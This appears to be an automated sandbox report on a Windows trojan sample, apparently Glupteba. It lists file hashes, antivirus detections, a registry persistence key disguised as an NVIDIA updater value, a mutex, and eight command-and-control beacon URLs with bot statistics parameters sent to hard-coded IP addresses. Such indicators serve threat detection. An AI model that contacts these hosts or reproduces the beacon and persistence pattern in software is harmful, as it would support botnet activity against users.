Analysis Date: 2015-02-14 09:52:50
MD5: 973d1e2aee67eced0839191770ccf09c
SHA1: 99577747124f162c3730349eb19642b0352170e1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5 10dd61995decd8cbe68931ca6a9479f5, sha1 ba7cfee8e6d1358ba534c35d6f821e91c9e994a4, size 90112
Section .rdata: md5 66329b13be5b7859127400967574535d, sha1 39ffc5c168a70c8e4cf8eef6c5f6ee65fb3e9c79, size 20480
Section .data: md5 b37492e408b1a4b57876bbdc47f297fe, sha1 ff500d0fc91fdf0b1026e10cc3f59097b0d2b3c2, size 8192
Section .rsrc: md5 728090b02f32116382fec7e84dc82f2a, sha1 40099e5c452e4321668ced2bd7c42914ae843725, size 4096
Timestamp: 2015-01-30 11:16:01
Packer: Microsoft Visual C++ v6.0
PEhash: cf71b4a56b4f3964b35f25853347383d48ff9801
IMPhash: 287310ce84b96d2c84675aa2a375b20f
AV 360 Safe: no_virus
AV Ad-Aware: no_virus
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): TR/Crypt.ZPACK.88240
AV BullGuard: no_virus
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Error Scanning File
AV Emsisoft: no_virus
AV Eset (nod32): Win32/Glupteba.M
AV Fortinet: W32/Kryptik.CWDU!tr
AV Frisk (f-prot): no_virus
AV F-Secure: no_virus
AV Grisoft (avg): Small.GWD
AV Ikarus: Trojan.Win32.Glupteba
AV K7: no_virus
AV Kaspersky: no_virus
AV MalwareBytes: Trojan.Agent
AV Mcafee: no_virus
AV Microsoft Security Essentials: Trojan:Win32/Carberp.I
AV MicroWorld (escan): no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 15150124\\x00
Creates File: \Device\Afd\Endpoint
Creates Mutex: Global\MD7H82HHF7EH2D73

Network Details:

HTTP GET: http://206.130.99.82:38102/stat?uid=100&downlink=1111&uplink=1111&id=00016C90&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=00018056&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://88.150.237.108:38727/stat?uid=100&downlink=1111&uplink=1111&id=000193FD&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://217.23.14.191:26195/stat?uid=100&downlink=1111&uplink=1111&id=0001A7A5&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://173.236.140.15:16577/stat?uid=100&downlink=1111&uplink=1111&id=0001BB3C&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://207.19.62.122:32406/stat?uid=100&downlink=1111&uplink=1111&id=0001CED4&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://62.210.217.195:49126/stat?uid=100&downlink=1111&uplink=1111&id=0001E26C&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GET: http://108.163.247.82:49891/stat?uid=100&downlink=1111&uplink=1111&id=0001F603&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 206.130.99.82:38102
Flows TCP: 192.168.1.1:1031 ➝ 206.130.99.82:38102
Flows TCP: 192.168.1.1:1032 ➝ 213.238.168.2:33879
Flows TCP: 192.168.1.1:1033 ➝ 88.150.237.108:38727
Flows TCP: 192.168.1.1:1034 ➝ 217.23.14.191:26195
Flows TCP: 192.168.1.1:1035 ➝ 173.236.140.15:16577
Flows TCP: 192.168.1.1:1036 ➝ 207.19.62.122:32406
Flows TCP: 192.168.1.1:1037 ➝ 62.210.217.195:49126
Flows TCP: 192.168.1.1:1038 ➝ 108.163.247.82:49891

Raw Pcap

Strings
